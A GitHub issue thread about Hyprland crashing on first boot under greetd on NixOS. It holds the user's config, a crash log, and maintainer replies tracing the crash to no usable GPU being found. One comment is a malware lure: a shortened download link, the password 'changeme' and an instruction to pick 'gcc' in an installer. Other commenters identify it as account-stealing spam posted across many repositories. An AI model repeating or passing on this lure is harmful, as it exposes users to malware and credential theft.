### ISSUE TITLE
Crash on every system start. Second start of hyprland successful

### ISSUE THREAD

**Issue by Schweber** [hyprwm/Hyprland#7547]
### Regression?

No

### System Info and Version

<details> <summary>System/Version info</summary>

```sh
Hyprland, built from branch main at commit 9a09eac79b85c846e3a865a9078a3f8ff65a9259  (props: bump version to 0.42.0).
Date: 2024-08-07
Tag: v0.42.0, commits: 9a09eac79b85c846e3a865a9078a3f8ff65a9259

flags: (if any)


System Information:
System name: Linux
Node name: desktop
Release: 6.10.6
Version: #1-NixOS SMP PREEMPT_DYNAMIC Mon Aug 19 04:05:40 UTC 2024


GPU information:
00:02.0 VGA compatible controller [0300]: Intel Corporation RocketLake-S GT1 [UHD Graphics 750] [8086:4c8a] (rev 04) (prog-if 00 [VGA controller])


os-release: ANSI_COLOR="1;34"
BUG_REPORT_URL="https://github.com/NixOS/nixpkgs/issues"
BUILD_ID="24.11.20240824.d0e1602"
DOCUMENTATION_URL="https://nixos.org/learn.html"
HOME_URL="https://nixos.org/"
ID=nixos
IMAGE_ID=""
IMAGE_VERSION=""
LOGO="nix-snowflake"
NAME=NixOS
PRETTY_NAME="NixOS 24.11 (Vicuna)"
SUPPORT_URL="https://nixos.org/community.html"
VERSION="24.11 (Vicuna)"
VERSION_CODENAME=vicuna
VERSION_ID="24.11"


plugins:

======Config-Start======


Config File: /home/sperber/.config/hypr/hyprland.conf: Read Succeeded
exec-once = nm-online -q &&sleep 2 &&ping -qc 1 -w 60 -i 0.1 github.com &&librewolf
exec-once = [workspace special:hdrop silent] kitty -1 --class kitty_hx hx
exec-once = kitty +kitten panel --edge=background btop

$mainMod = SUPER
# code:20=ß 34=ü 47=ö 48=ä

bind = $mainMod, e, exec, hdrop kitty --class kitty_1
bind = $mainMod ALT, e, exec, hdrop kitty --class kitty_2
bind = $mainMod, a, exec, hdrop kitty --class kitty_hx hx
bind = $mainMod ALT, a, exec, hdrop kitty --class kitty_code
bind = $mainMod, h, exec, hdrop godot4 --display-driver wayland
# bind = $mainMod, code:48, exec, hdrop foot -a foot_1 bash
# bind = $mainMod CTRL, code:48, exec, hdrop foot -a foot_2
# bind = $mainMod, code:47, exec, hdrop foot -a foot_hx hx
bind = $mainMod CTRL ALT, e, exec, foot bash
bind = $mainMod, y, exec, hdrop pcmanfm-qt
bind = $mainMod, i, exec, hdrop librewolf
# bind = $mainMod, h, exec, hdrop evolution
bind = $mainMod, code:20, exec, hdrop telegram-desktop
bind = $mainMod, code:34, exec, hdrop tor-browser
# bind = $mainMod, code:34, exec, hdrop gpick
bind = $mainMod, b, exec, hdrop -c libreoffice-writer libreoffice
bind = $mainMod, u, exec, keepassxc
bind = $mainMod, period, exec, fuzzel
bind = $mainMod, comma, exec, hdrop logseq
bind = $mainMod, k, exec, grimblast copy area
# bind = $mainMod, k, exec, grim -g "$(slurp)" - | wl-copy

bind = $mainMod, q, killactive
bind = , XF86Search, exec, reboot
# bind = , XF86Power, exec, shutdown now
bind = , XF86WakeUp, exec, hyprctl dispatch dpms off &&swaylock
# bind = , code:127, exec, kill -9 -1
bind = , Pause, exec, kill -9 -1

# Master Layout
bind = $mainMod, m, layoutmsg, swapwithmaster auto
# bind = $mainMod, C, fullscreen, 0 # Fullsreen
bind = $mainMod, l, fullscreen, 1 # Maximize

# Move focus
bind = $mainMod, t, movefocus, l
bind = $mainMod, r, movefocus, d
bind = $mainMod, n, movefocus, u
bind = $mainMod, s, movefocus, r

# bind = $mainMod SHIFT, N, focusmonitor, +1
# bind = $mainMod SHIFT, T, focusmonitor, -1

bind = $mainMod SHIFT, T, movewindow, l
bind = $mainMod SHIFT, S, movewindow, r
bind = $mainMod SHIFT, N, movewindow, u
bind = $mainMod SHIFT, R, movewindow, d

# Switch workspaces with mainMod + [0-9]
bind = $mainMod, 1, workspace, 1
bind = $mainMod, 2, workspace, 2
bind = $mainMod, 3, workspace, 3
bind = $mainMod, 4, workspace, 4
bind = $mainMod, 5, workspace, 5
bind = $mainMod, 6, workspace, 6
bind = $mainMod, 7, workspace, 7
bind = $mainMod, 8, workspace, 8
bind = $mainMod, 9, workspace, 9
bind = $mainMod, 0, workspace, 10

# Move active window to a workspace with mainMod + SHIFT + [0-9]
bind = $mainMod CTRL, 1, movetoworkspace, 1
bind = $mainMod CTRL, 2, movetoworkspace, 2
bind = $mainMod CTRL, 3, movetoworkspace, 3
bind = $mainMod CTRL, 4, movetoworkspace, 4
bind = $mainMod CTRL, 5, movetoworkspace, 5
bind = $mainMod CTRL, 6, movetoworkspace, 6
bind = $mainMod CTRL, 7, movetoworkspace, 7
bind = $mainMod CTRL, 8, movetoworkspace, 8
bind = $mainMod CTRL, 9, movetoworkspace, 9
bind = $mainMod CTRL, 0, movetoworkspace, 10

# next workspace on monitor
# bind = $mainMod, a, workspace, r+1
# bind = $mainMod, e, workspace, r-1
bind = $mainMod, p, exec, hyprnome --previous
bind = $mainMod, c, exec, hyprnome
# bind = SUPER_SHIFT, 1, exec, hyprnome --previous --move
# bind = SUPER_SHIFT, 2, exec, hyprnome --move

# Move/resize windows with mainMod + LMB/RMB and dragging
# bindm = $mainMod, mouse:272, movewindow
# bindm = $mainMod, mouse:273, resizewindow

# mouse side buttons
#bind=,mouse:275,exec,wl-copy $(wl-paste -p) # copy selected text
#bind=,mouse:276,exec,wtype -M ctrl -M shift v -m ctrl -m shift # paste by Ctrl+Shift+v

# fn buttons | "binde" allows press and hold
binde=,XF86AudioLowerVolume,  exec, wpctl set-volume @DEFAULT_AUDIO_SINK@ 3%-
binde=,XF86AudioRaiseVolume,  exec, wpctl set-volume @DEFAULT_AUDIO_SINK@ 3%+
# bind =,XF86AudioMute,         exec, wpctl set-mute @DEFAULT_AUDIO_SINK@ toggle
# bind =,XF86AudioMicMute,      exec, wpctl set-mute @DEFAULT_AUDIO_SOURCE@ toggle
binde =,XF86MonBrightnessUp, exec, light -A 5
binde =,XF86MonBrightnessDown, exec, light -U 5
bind =,XF86AudioPlay,         exec, playerctl play-pause
bind =,XF86AudioPrev,         exec, playerctl previous
bind =,XF86AudioNext,         exec, playerctl next



# Window Rules
# windowrulev2 = float,class:^(pcmanfm-qt)$,title:^(.*)(file|File|Choose|Preferences)(.*)$
windowrulev2 = float,title:^(.*)(file|File|Choose|Preferences)(.*)$ # aktuell wird keine class mehr angezeigt

windowrulev2 = maxsize 1920 1080,floating:1
windowrulev2 = center,floating:1
windowrulev2 = tile,class:^(org.godotengine.)(.*)$
windowrulev2 = suppressevent maximize,class:^(libreoffice)(.*)$
windowrulev2 = fullscreen,class:^(mpv|endless-sky)$
windowrulev2 = idleinhibit fullscreen,class:^(mpv|librewolf|Tor Browser)$
windowrulev2 = bordercolor rgb(FF0000),xwayland:1

windowrulev2 = float,title:^(Open|Choose Files|Save As|Notifications|Confirm to replace files|File Operation Progress|File Properties|Search Files)(.*)$
# librewolf
# windowrulev2 = float,class:^(librewolf)$,title:^(Notification|Picture-in-Picture)$
# windowrulev2 = pin,class:^(librewolf)$,title:^(Picture-in-Picture)$
# windowrulev2 = nofullscreenrequest,class:^(librewolf)$,title:^(Picture-in-Picture)$
# Telegram media viewer
# windowrulev2 = float,class:^(org.telegram.desktop)$,title:^(Media viewer)$
# windowrulev2 = center,class:^(org.telegram.desktop)$,title:^(Media viewer)$
# windowrulev2 = monitor 1,class:^(org.telegram.desktop)$,title:^(Media viewer)$


general {
    gaps_in = 0
    gaps_out = 0
    border_size = 1
    no_focus_fallback = true
    layout = master
    # no_border_on_floating = true
    # resize_on_border = true
    extend_border_grab_area = 30
}

decoration {
drop_shadow = false
dim_around = 0
    blur {
        enabled = false
        }
}

animations {
    enabled = false
}

input {
    kb_layout = de
    kb_variant = nodeadkeys
    kb_options = caps:backspace
    # xkbOptions = "ctrl:nocaps,kpdl:dot";
    # xkbOptions = "caps:backspace,grp:ctrl_space_toggle";
    numlock_by_default = true
    sensitivity = 1 # dpi beginnt bei rot = 1600 dpi, grün = 1800 passt ganz gut
    accel_profile = adaptive
    scroll_method = on_button_down
    scroll_button = 273
    scroll_factor = 2
    follow_mouse = 2
    mouse_refocus = false
    float_switch_override_focus = 0

touchpad {
    disable_while_typing = true
    natural_scroll = true
    # scroll_factor = 1.0
    # tap_button_map = lmr
    }
}

gestures {
    workspace_swipe = yes
    workspace_swipe_use_r = true
}

misc {
# disable_hyprland_logo = true
disable_splash_rendering = true
force_default_wallpaper = 0
background_color = rgb(404040)
mouse_move_enables_dpms = true
key_press_enables_dpms = true
focus_on_activate = true
close_special_on_empty = true
new_window_takes_over_fullscreen = 2
# hide_cursor_on_key_press = true
# vrr = 1
}

binds {
    scroll_event_delay = 5
    workspace_back_and_forth = true
}

# unscale XWayland
xwayland {
  force_zero_scaling = true
}

cursor {
    inactive_timeout = 2
    hide_on_key_press = true
    no_warps = true
    # no_hardware_cursors = true # für Nvidia
}

master {
    new_status = master
    new_on_top = true
    mfact = 0.50
    no_gaps_when_only = 1
    # smart_resizing = false
}

debug:disable_logs = false


# System ###

# exec-once = ironbar &
# exec-once = pueue -d &
exec-once = easyeffects --gapplication-service &
exec-once = wlsunset -t 3500 -T 6500 -l 50 -L 8.7 &
exec-once = wl-clip-persist --clipboard regular &
exec-once = swayidle -w timeout 600 'hyprctl dispatch dpms off &&hyprctl dispatch dpms off' timeout 1200 'swaylock' timeout 18000 'systemctl suspend' resume 'hyprctl dispatch dpms on' before-sleep 'swaylock' &

monitor=,preferred,auto,1.5
# monitor=DP-1,disable
# monitor=DP-2,disable
# monitor=DP-3,disable
monitor = HDMI-A-1, preferred, auto, 1.5
monitor = DP-1, preferred, auto-right, 1.5
monitor = eDP-1, preferred, auto-down, 1.33

env = BEMOJI_PICKER_CMD,fuzzel -d
env = BEMOJI_ECHO_NEWLINE,false

# env = XDG_CURRENT_DESKTOP,Hyprland
# env = XDG_SESSION_DESKTOP,Hyprland
# env = XDG_SESSION_TYPE,wayland

# env = CLUTTER_BACKEND,wayland
# env = GDK_BACKEND,wayland
env = SDL_VIDEODRIVER,wayland
env = MOZ_ENABLE_WAYLAND,1
env = NIXOS_OZONE_WL,1
env = _JAVA_AWT_WM_NONREPARENTING,1
# env = QT_QPA_PLATFORM,wayland
env = QT_AUTO_SCREEN_SCALE_FACTOR,1
env = QT_WAYLAND_DISABLE_WINDOWDECORATION,1

### Nvidia
# env = LIBVA_DRIVER_NAME,nvidia
# env = XDG_SESSION_TYPE,wayland
# env = GBM_BACKEND,nvidia-drm
# env = __GLX_VENDOR_LIBRARY_NAME,nvidia


exec-once = hyprctl setcursor Bibata-Modern-Amber 28
env = XCURSOR_SIZE,28
env = GTK_THEME,Flat-Remix-GTK-Grey-Darkest
env = XCURSOR_THEME,Bibata-Modern-Amber

# falls Programme verzögert starten
# exec-once = dbus-update-activation-environment --systemd WAYLAND_DISPLAY XDG_CURRENT_DESKTOP



======Config-End========
```

</details>

### Description

Hyprland crashes every time my system boots up. When it is launched a second time it works fine from then on until i reboot.

This already happened in version 0.41.x and it happens both on my intel desktop and amd laptop. Before v0.41.x it didn't happen if i remember correctly.

I don't know if this is a problem with hyprland itself or with its packaging for nixos.

### How to reproduce

Launch hyprland via greetd in nixos-unstable on boot. It then crashes and, in my case, tuigreet opens. When i launch hyprland from there it works fine.
```
  programs.hyprland = {
    enable = true;
  };
  services.greetd = {
    enable = true;
    settings = {
      initial_session = {
        command = "${pkgs.hyprland}/bin/hyprland";
        user = "sperber";
      };
      default_session = {
        command = ''${pkgs.greetd.tuigreet}/bin/tuigreet --user-menu'';
      };
    };
  };
```

### Crash reports, logs, images, videos

[hyprlandCrashReport1995.txt](https://github.com/user-attachments/files/16765970/hyprlandCrashReport1995.txt)

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by caineblood** [comment]
The above comment asking you to download a file is malware to steal your account; do not under any circumstances download or run it. The post needs to be removed. If you have attempted to run it please have your system cleaned and your account secured immediately.

**Comment by MahouShoujoMivutilde** [comment]
Holy fuck there is a lot of them https://github.com/search?q=is%3Aissue+%22In+the+installer+menu%2C+select+%22gcc.%22%22&type=issues&s=created&o=desc

**Comment by caineblood** [comment]
you are missing at least 3K more of them; try searching for "password: changeme" instead (with the quotes)

**Comment by caineblood** [comment]
https://github.com/search?q=is%3Aissue+%22password%3A+changeme%22&type=issues&s=created&o=desc

**Comment by MahouShoujoMivutilde** [comment]
Damn.

And it doesn't show the ones that were still up few days ago.

The search seems to be limited to 100 pages, it almost certainly more.

**Comment by inmymum** [comment]
@caineblood I downloaded it and examined it using nano. It is just a plaintext file containing a crash report. Here are the contents:
--------------------------------------------
   Hyprland Crash Report
--------------------------------------------
Calm down, it was a misinput! MISINPUT!

Hyprland received signal 6(ABRT)
Version: 9a09eac79b85c846e3a865a9078a3f8ff65a9259
Tag: v0.42.0
Date: 2024-08-07
Flags:

System info:
	System name: Linux
	Node name: desktop
	Release: 6.10.6
	Version: #1-NixOS SMP PREEMPT_DYNAMIC Mon Aug 19 04:05:40 UTC 2024

GPU:
	00:02.0 VGA compatible controller [0300]: Intel Corporation RocketLake-S GT1 [UHD Graphics 750] [8086:4c8a] (rev 04) (prog-if 00 [VGA controller])


os-release:
	ANSI_COLOR="1;34"
	BUG_REPORT_URL="https://github.com/NixOS/nixpkgs/issues"
	BUILD_ID="24.11.20240824.d0e1602"
	DOCUMENTATION_URL="https://nixos.org/learn.html"
	HOME_URL="https://nixos.org/"
	ID=nixos
	IMAGE_ID=""
	IMAGE_VERSION=""
	LOGO="nix-snowflake"
	NAME=NixOS
	PRETTY_NAME="NixOS 24.11 (Vicuna)"
	SUPPORT_URL="https://nixos.org/community.html"
	VERSION="24.11 (Vicuna)"
	VERSION_CODENAME=vicuna
	VERSION_ID="24.11"
Backtrace:
	# | /nix/store/i7drl25lsfhzq7m9nccbdb25x6sa9mzj-hyprland-0.42.0/bin/hyprland(_Z12getBacktracev+0x48) [0x72ee38]
		getBacktrace()
		??:?
	#1 | /nix/store/i7drl25lsfhzq7m9nccbdb25x6sa9mzj-hyprland-0.42.0/bin/hyprland(_ZN13CrashReporter18createAndSaveCrashEi+0x845) [0x685ff5]
		CrashReporter::createAndSaveCrash(int)
		??:?
	#2 | /nix/store/i7drl25lsfhzq7m9nccbdb25x6sa9mzj-hyprland-0.42.0/bin/hyprland(_Z25handleUnrecoverableSignali+0x5f) [0x5f5edf]
		handleUnrecoverableSignal(int)
		??:?
	#3 | /nix/store/5adwdl39g3k9a2j0qadvirnliv4r7pwd-glibc-2.39-52/lib/libc.so.6(+0x405c0) [0x7fbf589635c0]
		??
		??:0
	#4 | /nix/store/5adwdl39g3k9a2j0qadvirnliv4r7pwd-glibc-2.39-52/lib/libc.so.6(+0x927dc) [0x7fbf589b57dc]
		??
		??:0
	#5 | /nix/store/5adwdl39g3k9a2j0qadvirnliv4r7pwd-glibc-2.39-52/lib/libc.so.6(gsignal+0x16) [0x7fbf58963516]
		??
		??:0
	#6 | /nix/store/5adwdl39g3k9a2j0qadvirnliv4r7pwd-glibc-2.39-52/lib/libc.so.6(abort+0xd7) [0x7fbf5894b935]
		??
		??:0
	#7 | /nix/store/jfilhsiqdgm4nks2z6labx3iq9qd077a-gcc-13.3.0-lib/lib/libstdc++.so.6(+0xacc2b) [0x7fbf58cacc2b]
		??
		??:0
	#8 | /nix/store/jfilhsiqdgm4nks2z6labx3iq9qd077a-gcc-13.3.0-lib/lib/libstdc++.so.6(+0xbc20a) [0x7fbf58cbc20a]
		??
		??:0
	#9 | /nix/store/jfilhsiqdgm4nks2z6labx3iq9qd077a-gcc-13.3.0-lib/lib/libstdc++.so.6(+0xbc275) [0x7fbf58cbc275]
		??
		??:0
	#1 | /nix/store/jfilhsiqdgm4nks2z6labx3iq9qd077a-gcc-13.3.0-lib/lib/libstdc++.so.6(+0xbc4c7) [0x7fbf58cbc4c7]
		??
		??:0
	#11 | /nix/store/i7drl25lsfhzq7m9nccbdb25x6sa9mzj-hyprland-0.42.0/bin/hyprland() [0x55af1e]
		throwError(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) [clone .cold]
		??:?
	#12 | /nix/store/i7drl25lsfhzq7m9nccbdb25x6sa9mzj-hyprland-0.42.0/bin/hyprland(_ZN11CCompositor10initServerENSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEi+0x93c) [0x6112fc]
		CCompositor::initServer(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, int)
		??:?
	#13 | /nix/store/i7drl25lsfhzq7m9nccbdb25x6sa9mzj-hyprland-0.42.0/bin/hyprland(main+0xc8d) [0x5b326d]
		main
		??:?
	#14 | /nix/store/5adwdl39g3k9a2j0qadvirnliv4r7pwd-glibc-2.39-52/lib/libc.so.6(+0x2a14e) [0x7fbf5894d14e]
		??
		??:0
	#15 | /nix/store/5adwdl39g3k9a2j0qadvirnliv4r7pwd-glibc-2.39-52/lib/libc.so.6(__libc_start_main+0x89) [0x7fbf5894d209]
		??
		??:0
	#16 | /nix/store/i7drl25lsfhzq7m9nccbdb25x6sa9mzj-hyprland-0.42.0/bin/hyprland(_start+0x25) [0x5f5b95]
		_start
		??:?


Log tail:
[LOG] Version: #1-NixOS SMP PREEMPT_DYNAMIC Mon Aug 19 04:05:40 UTC 2024


[LOG] GPU information:
00:02.0 VGA compatible controller [0300]: Intel Corporation RocketLake-S GT1 [UHD Graphics 750] [8086:4c8a] (rev 04) (prog-if 00 [VGA controller])


[LOG] os-release:
ANSI_COLOR="1;34"
BUG_REPORT_URL="https://github.com/NixOS/nixpkgs/issues"
BUILD_ID="24.11.20240824.d0e1602"
DOCUMENTATION_URL="https://nixos.org/learn.html"
HOME_URL="https://nixos.org/"
ID=nixos
IMAGE_ID=""
IMAGE_VERSION=""
LOGO="nix-snowflake"
NAME=NixOS
PRETTY_NAME="NixOS 24.11 (Vicuna)"
SUPPORT_URL="https://nixos.org/community.html"
VERSION="24.11 (Vicuna)"
VERSION_CODENAME=vicuna
VERSION_ID="24.11"

[LOG] ========================



[INFO] If you are crashing, or encounter any bugs, please consult https://wiki.hyprland.org/Crashes-and-Bugs/


[LOG] 
Current splash: Join the discord server!


[LOG] Old rlimit: soft -> 1024, hard -> 524288
[LOG] New rlimit: soft -> 524288, hard -> 524288
[LOG] Creating the EventLoopManager!
[LOG] Creating the HookSystem!
[LOG] Creating the KeybindManager!
[LOG] Creating the AnimationManager!
[LOG] Created a bezier curve, baked 255 points, mem usage: 4.08kB, time to bake: 21.68µs. Estimated average calc time: 0.04µs.
[LOG] Creating the ConfigManager!
[LOG] Created a bezier curve, baked 255 points, mem usage: 4.08kB, time to bake: 13.74µs. Estimated average calc time: 0.05µs.
[LOG] Using config: /home/sperber/.config/hypr/hyprland.conf
[INFO] !!!!HEY YOU, YES YOU!!!!: further logs to stdout / logfile are disabled by default. BEFORE SENDING THIS LOG, ENABLE THEM. Use debug:disable_logs = false to do so: https://wiki.hyprland.org/Configuring/Variables/#debug
[LOG] Creating the CHyprError!
[LOG] Creating the LayoutManager!
[LOG] Creating the TokenManager!
[LOG] [hookSystem] New hook event registered: preConfigReload
[LOG] Created a bezier curve, baked 255 points, mem usage: 4.08kB, time to bake: 11.91µs. Estimated average calc time: 0.02µs.
[LOG] Using config: /home/sperber/.config/hypr/hyprland.conf
[LOG] Disabling stdout logs! Check the log for further logs.
[LOG] Creating the PointerManager!
[LOG] Creating the EventManager!
[LOG] [AQ] Creating an Aquamarine backend!
[LOG] [AQ] [libseat] [libseat/backend/seatd.c:64] Could not connect to socket /run/seatd.sock: No such file or directory
[LOG] [AQ] [libseat] [libseat/libseat.c:76] Backend 'seatd' failed to open seat, skipping
[LOG] [AQ] [libseat] [libseat/libseat.c:73] Seat opened with backend 'logind'
[LOG] [AQ] drm: Enumerated device /sys/devices/pci0000:00/0000:00:02.0/drm/card1
[ERR] [AQ] [libseat] [libseat/backend/logind.c:137] Could not take device: No such device
[ERR] [AQ] libseat: Couldn't open device at /dev/dri/card1
[ERR] [AQ] drm: Skipping device /sys/devices/pci0000:00/0000:00:02.0/drm/card1, not a KMS device
[LOG] [AQ] drm: Enumerated device /sys/devices/pci0000:00/0000:00:02.0/drm/card1/card1-DP-1
[ERR] [AQ] drm: Skipping device /sys/devices/pci0000:00/0000:00:02.0/drm/card1/card1-DP-1, no devnode
[LOG] [AQ] drm: Enumerated device /sys/devices/pci0000:00/0000:00:02.0/drm/card1/card1-HDMI-A-1
[ERR] [AQ] drm: Skipping device /sys/devices/pci0000:00/0000:00:02.0/drm/card1/card1-HDMI-A-1, no devnode
[LOG] [AQ] drm: Enumerated device /sys/devices/pci0000:00/0000:00:02.0/drm/card1/card1-HDMI-A-2
[ERR] [AQ] drm: Skipping device /sys/devices/pci0000:00/0000:00:02.0/drm/card1/card1-HDMI-A-2, no devnode
[ERR] [AQ] drm: Found no gpus to use, cannot continue
[ERR] [AQ] DRM Backend failed
[LOG] [AQ] Starting the Aquamarine backend!
[LOG] [AQ] Starting the Wayland backend!
[ERR] [AQ] Wayland backend cannot start: wl_display_connect failed (is a wayland compositor running?)
[ERR] [AQ] Requested backend (wayland) could not start, enabling fallbacks
[ERR] [AQ] Implementation wayland failed, erasing.
[CRITICAL] m_pAqBackend couldn't start! This usually means aquamarine could not find a GPU or encountered some issues. Make sure you're running either on a tty or on a Wayland session, NOT an X11 one.
[CRITICAL] Critical error thrown: CBackend::create() failed!

**Comment by inmymum** [comment]
I also happen to get this issue on arch, except every time I login it crashes. Had to switch to mint temporarily

**Comment by MahouShoujoMivutilde** [comment]
@inmymum It's not about the original issue, GitHub just silently deleted the spam comment in the meantime.

**Comment by ikalco** [comment]
try booting into tuigreet, sddm, or some other greeter
if it works on first boot for others then its a greetd problem

P.S.
the issue might because of configs, env vars, or permissions for greetd

**Comment by vaxerski** [comment]
this is not a hyprland issue, you are either missing gpu drivers or they are blocked in some way:
```
[ERR] [AQ] drm: Found no gpus to use, cannot continue
```
